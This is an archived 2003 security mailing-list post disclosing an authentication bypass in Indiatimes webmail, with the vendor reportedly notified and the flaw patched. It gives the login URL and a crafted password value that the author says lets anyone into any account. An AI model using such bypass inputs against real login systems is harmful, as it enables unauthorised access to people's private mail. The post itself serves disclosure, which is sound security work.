Indiatimes.com Mail Flaw

From: Mandar Punaskar (mandarp02_at_yahoo.com)
Date: 05/01/03

Next message: Security Alert: "SSRT3496 Potential Security Vulnerability in rexec"

Previous message: bluejay: "Re: How to delete file "entry" AND !!! file "body" on partition? Really delete "recoverable" file space"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 1 May 2003 03:51:40 -0700

hi all,

i discovered a security flaw in indiatimes.com (indias biggest web
based mail provider Timesgroup), which allow to login to any
indiatimes email account without password http://www.indiatimes.com

the trick:

url , to which form is submitted
http://mail.indiatimes.com/cgi-bin/login? login
name>&password=<your password>

just replace it with
http://mail.indiatimes.com/cgi-bin/login? login
name>&password=%%/r/n

and thats it , it will let you in

but wait guys ,
i have already informed same to indiatimes , and they have patched
their system

contact me for the details : mandarp02 at yahoo.com

Happy hacking.....

Mandar Punaskar

Next message: Security Alert: "SSRT3496 Potential Security Vulnerability in rexec"

Previous message: bluejay: "Re: How to delete file "entry" AND !!! file "body" on partition? Really delete "recoverable" file space"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]